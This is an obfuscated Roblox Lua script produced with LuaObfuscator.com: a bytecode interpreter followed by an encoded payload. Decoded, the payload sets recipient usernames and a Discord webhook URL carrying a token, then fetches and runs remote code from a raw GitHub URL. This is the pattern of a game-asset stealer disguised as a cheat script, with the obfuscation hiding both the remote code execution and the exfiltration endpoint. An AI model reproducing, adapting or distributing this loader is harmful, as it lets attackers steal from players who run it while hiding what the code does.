--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-1)))%((5 -(880 -(282 + 595)))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==(927 -((1851 -(1523 + 114)) + 713))) then v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + 4 + 0 ;return (v37 * (23917454 -7140238)) + (v36 * ((290007 -223406) -(68 + 997))) + (v35 * ((1643 -(32 + 85)) -(222 + 4 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(560 -(306 + 254))) then v39=0;v40=nil;v38=1 + 0 ;end if (v38~=3) then else v45=nil;v46=nil;v38=4;end if (v38~=(7 -3)) then else while true do if (v39~=(1467 -(899 + 568))) then else local v100=0 + 0 ;while true do if (v100==(0 -0)) then local v105=0 -0 ;while true do if (v105==(304 -(244 + 60))) then v40=603 -(268 + 335) ;v41=nil;v105=1;end if (v105==1) then v100=1;break;end end end if (v100==1) then v39=291 -(60 + 230) ;break;end end end if (v39==(574 -(426 + 146))) then local v101=0 + 0 ;while true do if (v101~=(1002 -(938 + 63))) then else v39=3 + 0 ;break;end if (v101==(1125 -(936 + 189))) then local v106=0 + 0 ;while true do if ((1456 -(282 + 1174))==v106) then v44=nil;v45=nil;v106=812 -(569 + 242) ;end if (v106==(2 -1)) then v101=1 + 0 ;break;end end end end end if (v39~=(1139 -(782 + 356))) then else local v102=1024 -(706 + 318) ;while true do if (v102~=(0 -0)) then else v42=nil;v43=nil;v102=1252 -(721 + 530) ;end if (v102~=(1272 -(945 + 326))) then else v39=1094 -(975 + 117) ;break;end end end if (v39==(7 -4)) then v46=nil;while true do local v103=0;local v104;while true do if ((0 + 0)~=v103) then else v104=0;while true do if (v104==1) then if (v40==(1 + 0)) then local v141=0 -0 ;local v142;while true do if (v141==(700 -(271 + 429))) then v142=0 + 0 ;while true do if (v142==(1500 -(1408 + 92))) then v44={v41,v42,nil,v43};v45=v24();v142=1;end if (v142==(2 -1)) then v46={};v40=1290 -(993 + 295) ;break;end end break;end end end if (v40~=(0 + 0)) then else local v143=0 -0 ;local v144;local v145;while true do if (v143==(1172 -(418 + 753))) then while true do if (v144==(0 + 0)) then v145=0 + 0 ;while true do if (v145~=0) then else v41={};v42={};v145=1;end if (v145==(612 -(602 + 9))) then v43={};v40=1190 -(449 + 740) ;break;end end break;end end break;end if (v143==0) then v144=0;v145=nil;v143=1 + 0 ;end end end break;end if (v104==(0 + 0)) then local v122=872 -(826 + 46) ;while true do if ((529 -(406 + 123))==v122) then if (v40==3) then local v148=1769 -(1749 + 20) ;local v149;while true do if (v148~=0) then else v149=947 -(245 + 702) ;while true do if (v149==(0 + 0)) then local v152=1322 -(1249 + 73) ;local v153;while true do if (v152==(0 -0)) then v153=0;while true do if (v153~=0) then else local v165=0 + 0 ;while true do if (v165==(0 + 0)) then for v172=1899 -(260 + 1638) ,v24() do v42[v172-(441 -(382 + 58)) ]=v29();end return v44;end end end end break;end end end end break;end end end if (2==v40) then local v150=0;local v151;while true do if (v150==(0 -0)) then v151=1145 -(466 + 679) ;while true do if (v151~=1) then else for v155=1,v24() do local v156=0 -0 ;local v157;local v158;while true do if (v156==(0 -0)) then v157=0 -0 ;v158=nil;v156=1901 -(106 + 1794) ;end if (v156~=(1 + 0)) then else while true do if (v157~=(0 + 0)) then else v158=v22();if (v21(v158,1691 -(1121 + 569) ,1 + 0 )~=(0 -0)) then else local v166=0 -0 ;local v167;local v168;local v169;local v170;local v171;while true do if (v166==(214 -(22 + 192))) then local v177=683 -(483 + 200) ;while true do if (v177==(114 -(4 + 110))) then v167=584 -(57 + 527) ;v168=nil;v177=1428 -(41 + 1386) ;end if (v177==(104 -(17 + 86))) then v166=766 -(468 + 297) ;break;end end end if (v166==(563 -(334 + 228))) then v169=nil;v170=nil;v166=6 -4 ;end if (v166==(4 -2)) then v171=nil;while true do if (v167==(0 + 0)) then local v178=0 -0 ;while true do if (v178~=(2 -1)) then else v167=167 -(122 + 44) ;break;end if (v178==0) then v168=0 -0 ;v169=nil;v178=1;end end end if (v167==(6 -4)) then while true do if (v168==(0 + 0)) then local v181=0 + 0 ;local v182;while true do if (v181~=(0 -0)) then else v182=0 + 0 ;while true do if (v182==(66 -(30 + 35))) then v168=1 + 0 ;break;end if (v182==(0 + 0)) then local v192=0;local v193;while true do if (v192~=(1257 -(1043 + 214))) then else v193=0 -0 ;while true do if (v193==(0 + 0)) then local v197=163 -(92 + 71) ;while true do if (v197==(1 + 0)) then v193=1213 -(323 + 889) ;break;end if (v197==(0 -0)) then v169=v21(v158,582 -(361 + 219) ,3 + 0 );v170=v21(v158,9 -5 ,326 -(53 + 267) );v197=1 + 0 ;end end end if (v193~=1) then else v182=414 -(15 + 398) ;break;end end break;end end end end break;end end end if (v168==(985 -(18 + 964))) then if (v21(v170,11 -8 ,2 + 1 )==(1791 -(573 + 1217))) then v171[3 + 1 ]=v46[v171[854 -(20 + 830) ]];end v41[v155]=v171;break;end if (v168==(2 + 0)) then local v184=126 -(116 + 10) ;local v185;local v186;while true do if (1~=v184) then else while true do if (v185~=0) then else v186=0 + 0 ;while true do if ((939 -(714 + 225))==v186) then local v194=0 -0 ;local v195;while true do if (0==v194) then v195=0 -0 ;while true do if (1~=v195) then else v186=1;break;end if (v195==(0 + 0)) then local v201=0 -0 ;while true do if (v201==(739 -(542 + 196))) then v195=1 -0 ;break;end if (v201==(0 + 0)) then if (v21(v170,1,1)==1) then v171[1 + 1 ]=v46[v171[2 + 0 ]];end if (v21(v170,1888 -(927 + 959) ,2)~=(1 + 0)) then else v171[7 -4 ]=v46[v171[7 -4 ]];end v201=1 -0 ;end end end end break;end end end if ((1552 -(1126 + 425))~=v186) then else v168=408 -(118 + 287) ;break;end end break;end end break;end if (v184~=(0 -0)) then else v185=285 -(175 + 110) ;v186=nil;v184=3 -2 ;end end end if (v168==1) then local v187=1121 -(118 + 1003) ;local v188;local v189;while true do if (v187==1) then while true do if (v188==(0 -0)) then v189=0 -0 ;while true do if ((377 -(142 + 235))==v189) then local v196=0;while true do if (v196~=1) then else v189=4 -3 ;break;end if (v196~=(0 + 0)) then else v171={v23(),v23(),nil,nil};if (v169==0) then local v198=0 + 0 ;local v199;local v200;while true do if (v198~=(0 + 0)) then else v199=0 + 0 ;v200=nil;v198=1;end if (v198~=1) then else while true do if (v199==0) then v200=0 + 0 ;while true do if (v200==(533 -(43 + 490))) then v171[3]=v23();v171[4]=v23();break;end end break;end end break;end end elseif (v169==(734 -(711 + 22))) then v171[2 + 1 ]=v24();elseif (v169==(2 + 0)) then v171[11 -8 ]=v24() -((861 -(240 + 619))^16) ;elseif (v169==3) then local v208=0 + 0 ;local v209;local v210;local v211;while true do if (1~=v208) then else v211=nil;while true do if (v209==0) then local v214=0 -0 ;while true do if (v214==(2 -1)) then v209=2 -1 ;break;end if ((0 + 0)~=v214) then else v210=0 -0 ;v211=nil;v214=754 -(239 + 514) ;end end end if ((406 -(255 + 150))==v209) then while true do if (v210~=(0 + 0)) then else v211=1329 -(797 + 532) ;while true do if (v211==(0 + 0)) then v171[12 -9 ]=v24() -((2 + 0)^16) ;v171[12 -8 ]=v23();break;end end break;end end break;end end break;end if (v208==(1739 -(404 + 1335))) then v209=0 + 0 ;v210=nil;v208=2 -1 ;end end end v196=1203 -(373 + 829) ;end end end if (v189~=1) then else v168=733 -(476 + 255) ;break;end end break;end end break;end if (v187==0) then v188=1130 -(369 + 761) ;v189=nil;v187=1 + 0 ;end end end end break;end if (v167==(1 -0)) then local v179=0;while true do if (v179~=(1 + 0)) then else v167=2;break;end if ((0 -0)~=v179) then else v170=nil;v171=nil;v179=1;end end end end break;end end end break;end end break;end end end v40=241 -(64 + 174) ;break;end if (v151==(337 -(10 + 327))) then local v154=0 + 0 ;while true do if (v154==1) then v151=1 -0 ;break;end if (v154~=(338 -(118 + 220))) then else for v160=1 + 0 ,v45 do local v161=449 -(108 + 341) ;local v162;local v163;local v164;while true do if ((336 -(144 + 192))==v161) then v162=0 + 0 ;v163=nil;v161=4 -3 ;end if (v161==(217 -(42 + 174))) then v164=nil;while true do if (v162~=(1 + 0)) then else if (v163==1) then v164=v22()~=(1493 -(711 + 782)) ;elseif (v163==(2 + 0)) then v164=v25();elseif (v163==(472 -(270 + 199))) then v164=v26();end v46[v160]=v164;break;end if (0==v162) then local v175=0 + 0 ;local v176;while true do if (v175==(1504 -(363 + 1141))) then v176=1580 -(1183 + 397) ;while true do if (v176==(2 -1)) then v162=1 + 0 ;break;end if (v176==(0 + 0)) then local v180=1975 -(1913 + 62) ;while true do if (v180~=(1 + 0)) then else v176=1;break;end if (v180~=(0 -0)) then else v163=v22();v164=nil;v180=1;end end end end break;end end end end break;end end end v44[2 + 1 ]=v22();v154=1934 -(565 + 1368) ;end end end end break;end end end v122=1168 -(645 + 522) ;end if (v122==(3 -2)) then v104=1;break;end end end end break;end end end break;end end break;end if (v38==(1662 -(1477 + 184))) then v41=nil;v42=nil;v38=2 -0 ;end if (v38==(2 + 0)) then v43=nil;v44=nil;v38=859 -(564 + 292) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,2 -1 ,(3311 -(990 + 465)) -(1045 + 791) ) * ((4 -2)^32)) + v47 ;local v51=v21(v48,31 -(5 + 5) ,536 -(351 + 68 + 86) );local v52=((v21(v48,1606 -(1281 + 293) )==1) and  -((260 + 7) -((110 -82) + 238))) or (2 -1) ;if (v51==0) then if (v50==(1559 -((3107 -(1668 + 58)) + 178))) then return v52 * (0 + 0) ;else local v91=0 + 0 ;while true do if ((0 + 0)==v91) then v51=3 -2 ;v49=0 + 0 ;break;end end end elseif (v51==(2517 -(381 + 89))) then return ((v50==(0 + 0)) and (v52 * ((1 + 0)/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(2179 -(1074 + 82)) ) * (v49 + (v50/(((629 -(512 + 114)) -1)^(1836 -(214 + 1570))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then local v86=0 -0 ;while true do if (v86==0) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -((1 + 2) -(2 + 0)) );v19=v19 + v53 ;local v55={};for v67=1 + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0 -0 ;local v58;local v59;while true do if (v57==(1994 -(109 + 1885))) then v58,v59=v1(v16,v19,v19 + (1471 -(1269 + 200)) );v19=v19 + ((3 -0) -1) ;v57=816 -(98 + 717) ;end if (v57==((123 + 704) -(802 + 24))) then return (v59 * (441 -185)) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v87=0;while true do if (v87==0) then v20=v0(v3(v60,1,1));return "";end end else local v88=v2(v0(v60,16));if v20 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v88,v20);v20=nil;v92=1;end end else return v88;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (v90==0) then v81=v69[v73];v82=v81[1];v90=1;end if (v90==1) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v63[v81[3]];else local v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));end elseif (v82<=2) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==3) then do return;end else local v123;local v124;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v124=v81[2];v123=v79[v81[3]];v79[v124 + 1 ]=v123;v79[v124]=v123[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];end elseif (v82<=6) then if (v82>5) then v79[v81[2]]=v81[3];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=7) then local v116=v81[2];local v117,v118=v72(v79[v116](v13(v79,v116 + 1 ,v81[3])));v74=(v118 + v116) -1 ;local v119=0;for v120=v116,v74 do local v121=0;while true do if (v121==0) then v119=v119 + 1 ;v79[v120]=v117[v119];break;end end end elseif (v82>8) then local v136=v81[2];local v137=v79[v81[3]];v79[v136 + 1 ]=v137;v79[v136]=v137[v81[4]];else v79[v81[2]]();end v73=v73 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O0003023O005F4703083O00557365724E616D6503053O00207737736803093O00557365724E616D6532030A3O006F70206469616D6F6E6403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323431322O39323O393533343731342F6841616C71424E42494F425F36384736343648326F424B7865782D614A6B68557A5357612D753959743458702O436647496749317378574D5754315F46497033315A4D52030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012043O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0002000400014O0007000100044O00015O00022O00083O000100012O00033O00017O00",v9(),...);end
